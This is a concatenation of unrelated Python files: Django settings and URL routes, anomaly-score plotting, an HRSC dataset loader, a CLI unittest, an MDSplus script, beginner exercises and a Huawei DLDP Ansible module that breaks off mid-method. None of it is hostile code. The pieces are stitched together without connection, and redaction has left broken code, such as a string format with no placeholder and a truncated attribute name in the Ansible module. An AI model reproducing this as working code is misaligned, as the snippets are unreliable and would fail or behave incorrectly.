AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Ashgabat' USE_I18N = True USE_L10N = True USE_TZ = True LOCALE_PATHS = [ 'locale/', os.path.join(BASE_DIR, 'locale'), os.path.join(BASE_DIR, PROJECT_NAME, 'locale'), ] # gettext = lambda s: s LANGUAGES = [ ('en', _('English')), ('tk', _('Turkmen')), ('ru', _('Russian')), ] # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATICFILES_FINDERS = [ 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ] STATICFILES_DIRS = [ os.path.join(BASE_DIR, PROJECT_NAME, 'static') ] # ManifestStaticFilesStorage is recommended in production, to prevent outdated # Javascript / CSS assets being served from cache (e.g. after a Wagtail upgrade). # See https://docs.djangoproject.com/en/3.1/ref/contrib/staticfiles/#manifeststaticfilesstorage STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage' STATIC_ROOT = os.path.join(BASE_DIR, 'static') with open(os.path.join(BASE_DIR, PROJECT_NAME, 'settings', 'last_update.txt'), 'r') as f: timestamp = f.readline().strip() STATIC_URL = f'/static/{timestamp}/' MEDIA_ROOT = os.path.join(BASE_DIR, 'media') # # AUTHENTICATION settings # LOGIN_URL = '/login/' # # LOGIN_REDIRECT_URL = '/' # # LOGOUT_REDIRECT_URL = 'account_login' # # EMAIL_USE_TLS = True # # EMAIL_HOST = get_secret('EMAIL_HOST') # EMAIL_PORT = get_secret('EMAIL_PORT') # EMAIL_HOST_USER = get_secret('EMAIL_HOST_USER') # EMAIL_HOST_PASSWORD = get_secret('EMAIL_HOST_PASSWORD') # SERVER_EMAIL = get_secret('EMAIL_HOST_USER') # DEFAULT_FROM_EMAIL = get_secret('EMAIL_HOST_USER') # # # Base URL to use when referring to full URLs within the Wagtail admin backend - # # e.g. in notification emails. Don't include '/admin' or a trailing slash # BASE_URL = 'https://pythonanywhere852.pythonanywhere.com/' # # # Session settings # SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db' # # # SESSION_EXPIRE_AT_BROWSER_CLOSE = True # # # SESSION_COOKIE_AGE = 5 * 60 # # SESSION_COOKIE_SAMESITE = 'Strict' # # SESSION_SAVE_EVERY_REQUEST = True import math import torch import matplotlib matplotlib.use('Agg') # or 'PS', 'PDF', 'SVG' import matplotlib.pyplot as plt import numpy as np from torchvision.utils import make_grid from datetime import datetime from PIL import Image import logging from time import time def plot_images_grid(x: torch.tensor, export_img, title: str = '', nrow=8, padding=2, normalize=False, pad_value=0): """ Plot 4D Tensor of images of shape (B x C x H x W) as a grid. """ grid = make_grid(x, nrow=nrow, padding=padding, normalize=normalize, pad_value=pad_value) npgrid = grid.cpu().numpy() plt.figure(figsize=(50,50)) plt.imshow(np.transpose(npgrid, (1, 2, 0)), interpolation='nearest') ax = plt.gca() ax.xaxis.set_visible(False) ax.yaxis.set_visible(False) if not (title == ''): plt.title(title) img = Image.new(mode='L', size=(4096,4096)) filename = export_img + '_' + str(datetime.now()) + '.png' img.save(filename, "PNG") plt.savefig(filename, bbox_inches='tight', pad_inches=0.1) plt.clf() def round_scores(x, num=5): return round(x, num) def digitize_scores(norms: list, anoms: list, num_bins = 21): logger = logging.getLogger() norm_start = time() data = np.append(anoms, norms) anoms_log = list(map(lambda x: math.log(x), anoms)) norms_log = list(map(lambda x: math.log(x), norms)) data = np.append(anoms_log, norms_log) anoms_normalized = list(map(lambda x: (x-min(data))/(max(data)-min(data)), anoms_log)) norms_normalized = list(map(lambda x: (x-min(data))/(max(data)-min(data)), norms_log)) norm_end = time() logger.info("Done normalizing anomaly scores (%s seconds)" % (norm_end-norm_start)) min_score = min(np.append(anoms_normalized, norms_normalized)) max_score = max(np.append(anoms_normalized, norms_normalized)) bins = np.linspace(min_score, max_score, num_bins+1) # list of bin edges bins = bins[1:num_bins] bin_norms = np.digitize(norms_normalized, bins, right=True) # list of bin number per score count_norms = np.zeros(num_bins) # counts of bin for i in bin_norms: count_norms[i] += 1 bin_anoms = np.digitize(anoms_normalized, bins) count_anoms = np.zeros(num_bins) for i in bin_anoms: count_anoms[i] += 1 bar_pos = np.arange(1, num_bins+1) step_size = 5 x_pos = np.arange(0, num_bins, step_size) pad = (bins[1]-bins[0])/2 lss2 = pad*2*step_size lss = bins[5]-bins[0] # label step size x_label = list(map(round_scores, np.arange(min_score+pad, max_score, lss))) return count_norms, count_anoms, bins, bar_pos, x_pos, x_label def normalize_bins(norm_bins, anom_bins): norm_total, anom_total = 0, 0 for i in norm_bins: norm_total += i for i in anom_bins: anom_total += i normalized_norm_bins = list(map(lambda x: round_scores(x/norm_total*100,2), norm_bins)) normalized_anom_bins = list(map(lambda x: round_scores(x/anom_total*100,2), anom_bins)) return normalized_norm_bins, normalized_anom_bins def plot_images_hist(normal_scores, anomaly_scores, export_img, title: str = '', auc = None): """ Plot 2d histogram """ logger = logging.getLogger() logger.info('Plotting histogram...') bar_width = 0.4 num_bins = 21 normal_scores_bin, anomaly_scores_bin, bins, bar_pos, x_pos, x_label = digitize_scores(normal_scores.tolist(), anomaly_scores.tolist(), num_bins) normalized_norm_sc_bin, normalized_anom_sc_bin = normalize_bins(normal_scores_bin, anomaly_scores_bin) fig, ax = plt.subplots() ax.bar(x=bar_pos-bar_width/2, height=normalized_norm_sc_bin, width=bar_width, label='Normal') ax.bar(x=bar_pos+bar_width/2, height=normalized_anom_sc_bin, width=bar_width, label='Crack') plt.ylabel('Frequency (%)') #ax.set_xticks(x_pos) #ax.set_xticklabels(x_label, rotation=30) ax.set_xticks([0,22]) ax.set_xticklabels([0,1]) plt.grid(axis='y', alpha=0.75) plt.xlabel('Anomaly score') plt.legend() if not (title == ''): if auc != None: plt.title(title + ' (AUC = ' + str(round(auc, 4)*100) + '%)') else: plt.title(title) img = Image.new(mode='L', size=(4,4)) filename = export_img + '_' + str(datetime.now()) + '.png' img.save(filename, "PNG") plt.savefig(filename, bbox_inches='tight', pad_inches=0.1) plt.clf() logger.info('Plotted histogram.') import os import time import os.path as osp import xml.etree.ElementTree as ET import numpy as np from PIL import Image from functools import partial from multiprocessing import Pool from .misc import img_exts def load_hrsc(img_dir, ann_dir, classes=None, img_keys=dict(), obj_keys=dict(), nproc=10): if classes is not None: print('load_hrsc loads all objects as ship, arguments classes is no use') assert osp.isdir(img_dir), f'The {img_dir} is not an existing dir!' assert ann_dir is None or osp.isdir(ann_dir), f'The {ann_dir} is not an existing dir!' contents = [] print('Starting loading HRSC dataset information.') start_time = time.time() _load_func = partial(_load_hrsc_single, img_dir=img_dir, ann_dir=ann_dir, img_keys=img_keys, obj_keys=obj_keys) if nproc > 1: pool = Pool(nproc) contents = pool.map(_load_func, os.listdir(img_dir)) pool.close() else: contents = list(map(_load_func, os.listdir(img_dir))) contents = [c for c in contents if c is not None] end_time = time.time() print(f'Finishing loading HRSC, get {len(contents)} images,', f'using {end_time-start_time:.3f}s.') return contents, ['ship'] def _load_hrsc_single(imgfile, img_dir, ann_dir, img_keys, obj_keys): img_id, ext = osp.splitext(imgfile) if ext not in img_exts: return None xmlfile = None if ann_dir is None else osp.join(ann_dir, img_id+'.xml') content = _load_hrsc_xml(xmlfile, img_keys, obj_keys) if not ('width' in content and 'height' in content): imgpath = osp.join(img_dir, imgfile) size = Image.open(imgpath).size content.update(dict(width=size[0], height=size[1])) content.update(dict(filename=imgfile, id=img_id)) return content def _load_hrsc_xml(xmlfile, img_keys=dict(), obj_keys=dict()): hbboxes, bboxes, diffs = list(), list(), list() content = {k: None for k in img_keys} ann = {k: [] for k in obj_keys} if xmlfile is None: pass elif not osp.isfile(xmlfile): print(f"Can't find {xmlfile}, treated as empty xmlfile") else: tree = ET.parse(xmlfile) root = tree.getroot() content['width'] = int(root.find('Img_SizeWidth').text) content['height'] = int(root.find('Img_SizeHeight').text) for k, xml_k in img_keys.items(): node = root.find(xml_k) value = None if node is None else node.text content[k] = value objects = root.find('HRSC_Objects') for obj in objects.findall('HRSC_Object'): hbboxes.append([ float(obj.find('box_xmin').text), float(obj.find('box_ymin').text), float(obj.find('box_xmax').text), float(obj.find('box_ymax').text) ]) bboxes.append([ float(obj.find('mbox_cx').text), float(obj.find('mbox_cy').text), float(obj.find('mbox_w').text), float(obj.find('mbox_h').text), -float(obj.find('mbox_ang').text) ]) diffs.append( int(obj.find('difficult').text)) for k, xml_k in obj_keys.items(): node = obj.find(xml_k) value = None if node is None else node.text ann[k].append(value) hbboxes = np.array(hbboxes, dtype=np.float32) if hbboxes \ else np.zeros((0, 4), dtype=np.float32) bboxes = np.array(bboxes, dtype=np.float32) if bboxes \ else np.zeros((0, 5), dtype=np.float32) diffs = np.array(diffs, dtype=np.int64) if diffs \ else np.zeros((0, ), dtype=np.int64) labels = np.zeros((bboxes.shape[0], ), dtype=np.int64) ann['hbboxes'] = hbboxes ann['bboxes'] = bboxes ann['diffs'] = diffs ann['labels'] = labels content['ann'] = ann return content # -*- encoding: utf-8 -*- from django.conf.urls.defaults import * from . import views, models urlpatterns = patterns('', # Journal Tools url(r'^$', views.journal_index, {'model': models.Journal}, name="journal.index"), url(r'^new/$', views.add_journal, name='journal.add'), url(r'^(?P<journal_id>\d+)/dash/$', views.dash_journal, name='journal.dash'), url(r'^(?P<journal_id>\d+)/edit/$', views.add_journal, name='journal.edit'), url(r'^(?P<object_id>\d+)/toggle_availability/$', views.generic_toggle_availability, {'model': models.Journal}, name='journal.toggle_availability'), url(r'^(?P<journal_id>\d+)/edit/status/$', views.edit_journal_status, name='journal_status.edit'), url(r'^del_pended/(?P<form_hash>\w+)/$', views.del_pended, name='journal.del_pended'), #Editor Pages url(r'^(?P<journal_id>\d+)/edash/$', views.dash_editor_journal, name='editor_journal.dash'), url(r'ej/$', views.editor_journal, name='editor_journal.index'), # Sponsor Tools url(r'^sponsor/$', views.sponsor_index, {'model': models.Sponsor}, name='sponsor.index'), url(r'^sponsor/new/$', views.add_sponsor, name='sponsor.add'), url(r'^sponsor/(?P<sponsor_id>\d+)/edit/$', views.add_sponsor, name='sponsor.edit'), url(r'^sponsor/(?P<object_id>\d+)/toggle_availability/$', views.generic_toggle_availability, {'model': models.Sponsor}, name='sponsor.toggle_availability'), # Editors url(r'^(?P<journal_id>\d+)/editors/$', views.journal_editors, name='journal_editors.index'), url(r'^(?P<journal_id>\d+)/editors/add$', views.journal_editors_add, name='journal_editors.add'), url(r'^(?P<journal_id>\d+)/editors/(?P<user_id>\d+)/remove/$', views.journal_editors_remove, name='journal_editors.remove'), # Section Tools url(r'^(?P<journal_id>\d+)/section/$', views.section_index, {'model': models.Section}, name='section.index'), url(r'^(?P<journal_id>\d+)/section/new/$', views.add_section, name='section.add'), url(r'^(?P<journal_id>\d+)/section/(?P<section_id>\d+)/edit/$', views.add_section, name='section.edit'), url(r'^(?P<journal_id>\d+)/section/(?P<section_id>\d+)/del/$', views.del_section, name='section.del'), # Press release Tools url(r'^(?P<journal_id>\d+)/prelease/$', views.pressrelease_index, name='prelease.index'), url(r'^(?P<journal_id>\d+)/prelease/new/$', views.add_pressrelease, name='prelease.add'), url(r'^(?P<journal_id>\d+)/prelease/(?P<prelease_id>\d+)/edit/$', views.add_pressrelease, name='prelease.edit'), url(r'^(?P<journal_id>\d+)/aprelease/new/$', views.add_aheadpressrelease, name='aprelease.add'), url(r'^(?P<journal_id>\d+)/aprelease/(?P<prelease_id>\d+)/edit/$', views.add_aheadpressrelease, name='aprelease.edit'), # Issue Tools url(r'^(?P<journal_id>\d+)/issue/$', views.issue_index, name='issue.index'), url(r'^(?P<journal_id>\d+)/issue/new/regular/$', views.add_issue, {'issue_type': 'regular'}, name='issue.add_regular'), url(r'^(?P<journal_id>\d+)/issue/new/special/$', views.add_issue, {'issue_type': 'special'}, name='issue.add_special'), url(r'^(?P<journal_id>\d+)/issue/new/supplement/$', views.add_issue, {'issue_type': 'supplement'}, name='issue.add_supplement'), url(r'^(?P<journal_id>\d+)/issue/reorder/$', views.issue_reorder, name='issue.reorder.ajax'), url(r'^(?P<journal_id>\d+)/issue/(?P<issue_id>\d+)/edit/$', views.edit_issue, name='issue.edit'), url(r'^issue/(?P<object_id>\d+)/toggle_availability/$', views.generic_toggle_availability, {'model': models.Issue}, name='issue.toggle_availability'), # Users Tools url(r'^user/$', views.user_index, name="user.index"), url(r'^user/new/$', views.add_user, name="user.add"), url(r'^user/(?P<user_id>\d+)/edit/$', views.add_user, name="user.edit"), url(r'^user/(?P<user_id>\d+)/toggle_availability/$', views.toggle_user_availability, name='user.toggle_availability'), url(r'^user/(?P<user_id>\d+)/toggle_active_collection/(?P<collection_id>\d+)$', views.toggle_active_collection, name='usercollection.toggle_active'), # Ajax requests url(r'^ajx/ajx1/$', views.ajx_list_issues_for_markup_files, name="ajx.list_issues_for_markup_files"), url(r'^ajx/ajx2/$', views.ajx_lookup_for_section_translation, name="ajx.lookup_for_section_translation"), ) import unittest import os import sys import subprocess sys.path.insert(0, "..") from progressio.progressio import ( add, get_item) class TestDelete(unittest.TestCase): def setUp(self): """ Clean up old progress files. """ filelist = [f for f in os.listdir(".") if f.startswith("progress.")] for f in filelist: os.remove(f) def test_item_can_be_deleted(self): """ Item can be deleted and message is shown. """ # create progress.db p = subprocess.Popen('../progressio/progressio.py', stdin=subprocess.PIPE) p.communicate('y\n') # add item, it is added with pk=1 add('item to be deleted') p = subprocess.Popen( '../progressio/progressio.py delete 1', stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) output = p.communicate('y\n')[0] self.assertTrue("Deleted item 1" in output) # item is not in database self.assertTrue(get_item(1) is None) def test_if_not_confirmed_not_deleted(self): """ If delete operation is not confirmed item is not deleted. """ # create progress.db p = subprocess.Popen('../progressio/progressio.py', stdin=subprocess.PIPE) p.communicate('y\n') # add item, it is added with pk=1 add('item to be deleted') p = subprocess.Popen( '../progressio/progressio.py delete 1', stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) output = p.communicate('n\n')[0] self.assertFalse("Deleted item 1" in output) # item is in database self.assertFalse(get_item(1) is None) if __name__ == '__main__': unittest.main() <filename>ohsiha/core/forms.py from django import forms from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User class RegisterForm(UserCreationForm): email = forms.EmailField(max_length=254) class Meta: model = User fields = ('username', 'email', '<PASSWORD>', '<PASSWORD>', )from MDSplus import * modelTree=Tree("spectroscopy",-1) s_old=1180626500 s=1180705500 for i in range (1,41): modelTree.createPulse(s+i) myTree=Tree("spectroscopy",s+i) myTree.getNode("gpi_tcv.APD_ARRAY.CONTROL.FILTER.VALUE").putData('DA6563') for j in range (1,5): for k in range (1,33): if k<10: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_0'+str(k)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_0'+str(k)).putData(myTree.tdiCompile(str(a[0:2000]))) else: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_'+str(k)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq132_'+str(j)+'.input_'+str(k)).putData(myTree.tdiCompile(str(a[0:2000]))) for j in range (1,33): if j<10: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq196.input_0'+str(j)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq196.input_0'+str(j)).putData(myTree.tdiCompile(str(max(a)))) else: a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.hardware.acq196.input_'+str(j)).getData().data().tolist() myTree.getNode('gpi_tcv.apd_array.hardware.acq196.input_'+str(j)).putData(myTree.tdiCompile(str(max(a)))) for j in range (1,9): a=Tree('spectroscopy',s_old+i).getNode('gpi_tcv.apd_array.control.hv_prog_'+str(j)).getData().data() myTree.getNode('gpi_tcv.apd_array.control.hv_prog_'+str(j)).putData(myTree.tdiCompile(str(a))) myTree.close() #close the tree modelTree.close() #close the tree <reponame>GuilhermoCampos/Curso-Python3-curso-em-video n1 = int(input('Digite um número para ver sua tabuada: ')) i = n1 * int(1) II = n1 * int(2) III = n1 * int(3) IV = n1 * int(4) V = n1 * int(5) VI = n1 * int(6) VII = n1 * int(7) VIII = n1 * int(8) IX = n1 * int(9) X = n1 * int(10) print('A tabuada de {} é '.format(n1)) print('1x={} 2x={} 3x={}'.format(i, II, III)) print('4x={} 5x={} 6x={}'.format(IV, V, VI)) print('7x={} 8x={} 9x={}'.format(VII, VIII, IX)) print('10x={}'.format(X)) <filename>py/10.py import primes, os sum = 0 for i in range(0, 2000000): if i % 2 == 1 and primes.isPrime(i): sum = sum + i print(i) os.system("clear") print(sum) <gh_stars>1-10 #!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: ce_dldp version_added: "2.4" short_description: Manages global DLDP configuration on HUAWEI CloudEngine switches. description: - Manages global DLDP configuration on HUAWEI CloudEngine switches. author: - <NAME> (@QijunPan) notes: - The relevant configurations will be deleted if DLDP is disabled using enable=disable. - When using auth_mode=none, it will restore the default DLDP authentication mode. By default, DLDP packets are not authenticated. - By default, the working mode of DLDP is enhance, so you are advised to use work_mode=enhance to restore defualt DLDP working mode. - The default interval for sending Advertisement packets is 5 seconds, so you are advised to use time_interval=5 to restore defualt DLDP interval. options: enable: description: - Set global DLDP enable state. choices: ['enable', 'disable'] work_mode: description: - Set global DLDP work-mode. choices: ['enhance', 'normal'] time_internal: description: - Specifies the interval for sending Advertisement packets. The value is an integer ranging from 1 to 100, in seconds. The default interval for sending Advertisement packets is 5 seconds. auth_mode: description: - Specifies authentication algorithm of DLDP. choices: ['md5', 'simple', 'sha', 'hmac-sha256', 'none'] auth_pwd: description: - Specifies authentication password. The value is a string of 1 to 16 case-sensitive plaintexts or 24/32/48/108/128 case-sensitive encrypted characters. The string excludes a question mark (?). reset: description: - Specify whether reset DLDP state of disabled interfaces. choices: ['enable', 'disable'] ''' EXAMPLES = ''' - name: DLDP test hosts: cloudengine connection: local gather_facts: no vars: cli: host: "{{ inventory_hostname }}" port: "{{ ansible_ssh_port }}" username: "{{ username }}" password: "{{ password }}" transport: cli tasks: - name: "Configure global DLDP enable state" ce_dldp: enable: enable provider: "{{ cli }}" - name: "Configure DLDP work-mode and ensure global DLDP state is already enabled" ce_dldp: enable: enable work_mode: normal provider: "{{ cli }}" - name: "Configure advertisement message time interval in seconds and ensure global DLDP state is already enabled" ce_dldp: enable: enable time_interval: 6 provider: "{{ cli }}" - name: "Configure a DLDP authentication mode and ensure global DLDP state is already enabled" ce_dldp: enable: enable auth_mode: md5 auth_pwd: <PASSWORD> provider: "{{ cli }}" - name: "Reset DLDP state of disabled interfaces and ensure global DLDP state is already enabled" ce_dldp: enable: enable reset: enable provider: "{{ cli }}" ''' RETURN = ''' proposed: description: k/v pairs of parameters passed into module returned: always type: dict sample: { "enable": "enable", "reset": "enable", "time_internal": "12", "work_mode": "normal" } existing: description: k/v pairs of existing global DLDP configration returned: always type: dict sample: { "enable": "disable", "reset": "disable", "time_internal": "5", "work_mode": "enhance" } end_state: description: k/v pairs of global DLDP configration after module execution returned: always type: dict sample: { "enable": "enable", "reset": "enable", "time_internal": "12", "work_mode": "normal" } updates: description: command sent to the device returned: always type: list sample: [ "dldp enable", "dldp work-mode normal", "dldp interval 12", "dldp reset" ] changed: description: check to see if a change was made on the device returned: always type: bool sample: true ''' import copy from xml.etree import ElementTree from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.network.cloudengine.ce import ce_argument_spec, set_nc_config, get_nc_config, execute_nc_action CE_NC_ACTION_RESET_DLDP = """ <action> <dldp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0"> <resetDldp></resetDldp> </dldp> </action> """ CE_NC_GET_GLOBAL_DLDP_CONFIG = """ <filter type="subtree"> <dldp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0"> <dldpSys> <dldpEnable></dldpEnable> <dldpInterval></dldpInterval> <dldpWorkMode></dldpWorkMode> <dldpAuthMode></dldpAuthMode> </dldpSys> </dldp> </filter> """ CE_NC_MERGE_DLDP_GLOBAL_CONFIG_HEAD = """ <config> <dldp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0"> <dldpSys operation="merge"> <dldpEnable>%s</dldpEnable> <dldpInterval>%s</dldpInterval> <dldpWorkMode>%s</dldpWorkMode> """ CE_NC_MERGE_DLDP_GLOBAL_CONFIG_TAIL = """ </dldpSys> </dldp> </config> """ class Dldp(object): """Manage global dldp configration""" def __init__(self, argument_spec): self.spec = argument_spec self.module = None self.init_module() # DLDP global configration info self.enable = self.module.params['enable'] or None self.work_mode = self.module.params['work_mode'] or None self.internal = self.module.params['time_interval'] or None self.reset = self.module.params['reset'] or None self.auth_mode = self.module.params['auth_mode'] self.auth_pwd = self.module.params['auth_pwd'] self.dldp_conf = dict() self.same_conf = False # state self.changed = False self.updates_cmd = list() self.results = dict() self.proposed = dict() self.existing = list() self.end_state = list() def check_config_if_same(self): """Judge whether current config is the same as what we excepted""" if self.enable and self.enable != self.dldp_conf['dldpEnable']: return False if self.internal and self.internal != self.dldp_conf['dldpInterval']: return False work_mode = 'normal' if self.dldp_conf['dldpWorkMode'] == 'dldpEnhance': work_mode = 'enhance' if self.work_mode and self.work_mode != work_mode: return False if self.auth_mode: if self.auth_mode != 'none': return False if self.auth_mode == 'none' and self.dldp_conf['dldpAuthMode'] != 'dldpAuthNone': return False if self.reset and self.reset == 'enable': return False return True def check_params(self): """Check all input params""" if (self.auth_mode and self.auth_mode != 'none' and not self.auth_pwd) \ or (self.auth_pwd and not self.auth_mode): self.module.fail_json(msg="Error: auth_mode and auth_pwd must both exist or not exist.") if self.dldp_conf['dldpEnable'] == 'disable' and not self.enable: if self.work_mode or self.reset or self.internal or self.auth_mode: self.module.fail_json(msg="Error: when DLDP is already disabled globally, " "work_mode, time_internal auth_mode and reset parameters are not " "expected to configure.") if self.enable == 'disable' and (self.work_mode or self.internal or self.reset or self.auth_mode): self.module.fail_json(msg="Error: when using enable=disable, work_mode, " "time_internal auth_mode and reset parameters are not expected " "to configure.") if self.internal: if not self.internal.isdigit(): self.module.fail_json( msg='Error: time_interval must be digit.') if int(self.internal) < 1 or int(self.internal) > 100: self.module.fail_json( msg='Error: The value of time_internal should be between 1 and 100.') if self.auth_pwd: if '?' in self.auth_pwd: self.module.fail_json( msg='Error: The auth_pwd string excludes a question mark (?).') if (len(self.auth_pwd) != 24) and (len(self.auth_pwd) != 32) and (len(self.auth_pwd) != 48) and \ (len(self.auth_pwd) != 108) and (len(self.auth_pwd) != 128): if (len(self.auth_pwd) < 1) or (len(self.auth_pwd) > 16): self.module.fail_json( msg='Error: The value is a string of 1 to 16 case-sensitive plaintexts or 24/32/48/108/128 ' 'case-sensitive encrypted characters.') def init_module(self): """Init module object""" self.module = AnsibleModule( argument_spec=self.spec, supports_check_mode=True) def check_response(self, xml_str, xml_name): """Check if response message is already succeed""" if "<ok/>" not in xml_str: self.module.fail_json(msg='Error: %s failed.' % xml_name) def get_dldp_exist_config(self): """Get current dldp existed configuration""" dldp_conf = dict() xml_str = CE_NC_GET_GLOBAL_DLDP_CONFIG con_obj = get_nc_config(self.module, xml_str) if "<data/>" in con_obj: return dldp_conf xml_str = con_obj.replace('\r', '').replace('\n', '').\ replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\ replace('xmlns="http://www.huawei.com/netconf/vrp"', "") # get global DLDP info root = ElementTree.fromstring(xml_str) topo = root.find("data/dldp/dldpSys") if not topo: self.module.fail_json( msg="Error: Get current DLDP configration failed.") for eles in topo: if eles.tag in ["dldpEnable", "dldpInterval", "dldpWorkMode", "dldpAuthMode"]: if eles.tag == 'dldpEnable': if eles.text == 'true': value = 'enable' else: value = 'disable' else: value = eles.text dldp_conf[eles.tag] = value return dldp_conf def config_global_dldp(self): """Config global dldp""" if self.same_conf: return enable = self.enable if not self.enable: enable = self.dldp_conf['dldpEnable'] if enable == 'enable': enable = 'true' else: enable = 'false' internal = self.internal if not self.internal: internal = self.dldp_conf['dldpInterval'] work_mode = self.work_mode if not self.work_mode: work_mode = self.dldp_conf['dldpWorkMode'] if work_mode == 'enhance' or work_mode == 'dldpEnhance': work_mode = 'dldpEnhance' else: work_mode = 'dldpNormal' auth_mode = self.auth_mode if not self.auth_mode: auth_mode = self.dldp_conf['dldpAuthMode'] if auth_mode == 'md5': auth_mode = 'dldpAuthMD5' elif auth_mode == 'simple': auth_mode = 'dldpAuthSimple' elif auth_mode == 'sha': auth_mode = 'dldpAuthSHA' elif auth_mode == 'hmac-sha256': auth_mode = 'dldpAuthHMAC-SHA256' elif auth_mode == 'none': auth_mode = 'dldpAuthNone' xml_str = CE_NC_MERGE_DLDP_GLOBAL_CONFIG_HEAD % ( enable, internal, work_mode) if self.auth_mode: if self.auth_mode == 'none': xml_str += "<dldpAuthMode>dldpAuthNone</dldpAuthMode>" else: xml_str += "<dldpAuthMode>%s</dldpAuthMode>" % auth_mode xml_str += "<dldpPasswords><PASSWORD>>" % self.auth_pwd xml_str += CE_NC_MERGE_DLDP_GLOBAL_CONFIG_TAIL ret_xml = set_nc_config(self.module, xml_str) self.check_response(ret_xml, "MERGE_DLDP_GLOBAL_CONFIG") if self.reset == 'enable': xml_str = CE_NC_ACTION_RESET_DLDP ret_xml = execute_nc_action(self.module, xml_str) self.check_response(ret_xml, "ACTION_RESET_DLDP") self.changed = True def get_existing(self): """Get existing info""" dldp_conf = dict() dldp_conf['enable'] = self.dldp_conf.get('dldpEnable', None) dldp_conf['time_interval'] = self.dldp_conf.get('dldpInterval', None) work_mode = self.dldp_conf.get('dldpWorkMode', None) if work_mode == 'dldpEnhance': dldp_conf['work_mode'] = 'enhance' else: dldp_conf['work_mode'] = 'normal' auth_mode = self.dldp_conf.get('dldpAuthMode', None) if auth_mode == 'dldpAuthNone': dldp_conf['auth_mode'] = 'none' elif auth_mode == 'dldpAuthSimple': dldp_conf['auth_mode'] = 'simple' elif auth_mode == 'dldpAuthMD5': dldp_conf['auth_mode'] = 'md5' elif auth_mode == 'dldpAuthSHA': dldp_conf['auth_mode'] = 'sha' else: dldp_conf['auth_mode'] = 'hmac-sha256' dldp_conf['reset'] = 'disable' self.existing = copy.deepcopy(dldp_conf) def get_proposed(self): """Get proposed result""" self.proposed = dict(enable=self.enable, work_mode=self.work_mode, time_interval=self.internal, reset=self.reset, auth_mode=self.auth_mode, auth_pwd=self.auth_<PASSWORD>) def get_update_cmd(self): """Get update commands""" if self.same_conf: return if self.enable and self.enable != self.dldp_conf['dldpEnable']: if self.enable == 'enable': self.updates_cmd.append("dldp enable") elif self.enable == 'disable': self.updates_cmd.append("undo dldp enable") return work_mode = 'normal' if self.dldp_conf['dldpWorkMode'] == 'dldpEnhance': work_mode = 'enhance' if self.work_mode and self.work_mode != work_mode: if self.work_mode == 'enhance': self.updates_cmd.append("dldp work-mode enhance") else: self.updates_cmd.append("dldp work-mode normal") if self.internal and self.internal != self.dldp_conf['dldpInterval']: self.updates_cmd.append("dldp interval %s" % self.internal) if self.auth_mode: if self.auth_mode == 'none': self.updates_cmd.append("undo dldp authentication-mode") else: self.updates_cmd.append("dldp authentication-mode %s %s" % (self.auth_mode, self.auth_pwd)) if self.reset and self.reset == 'enable': self.updates_cmd.append('dldp reset') def get_end_state(self): """Get end state info""" dldp_conf = dict() self.dldp_conf = self.get_dldp_exist_config() dldp_conf['enable'] = self.dldp_conf.get('dldpEnable', None) dldp_conf['time_interval'] = self.dldp_conf.get('dldpInterval', None) work_mode = self.dldp_conf.get('dldpWorkMode', None) if work_mode == 'dldpEnhance': dldp_conf['work_mode'] = 'enhance' else: dldp_conf['work_mode'] = 'normal' auth_mode = self.dldp_conf.get('dldpAuthMode', None) if auth_mode == 'dldpAuthNone': dldp_conf['auth_mode'] = 'none' elif auth_mode == 'dldpAuthSimple': dldp_conf['auth_mode'] = 'simple' elif auth_mode == 'dldpAuthMD5': dldp_conf['auth_mode'] = 'md5' elif auth_mode == 'dldpAuthSHA': dldp_conf['auth_mode'] = 'sha' else: dldp_conf['auth_mode'] = 'hmac-sha256' dldp_conf['reset'] = 'disable' if self.reset == 'enable': dldp_conf['reset'] = 'enable' self.end_state = copy.deepcopy(dldp_conf) def show_result(self): """Show result""" self.results['changed'] = self.changed self.results['proposed'] = self.proposed self.results['existing'] = self.existing self.results['end_state'] = self.end_state if self.changed: self.results['updates'] = self.updates_cmd else: self.results['updates'] = list() self.module.exit_json(**self.results) def work(self): """Worker""" self.dldp_conf = self.get_dldp_exist_config() self.check_params() self.same_conf = self.check_config_if_same() self.get_existing() self.get_proposed() self.config_global_dldp() self.get_update_cmd() 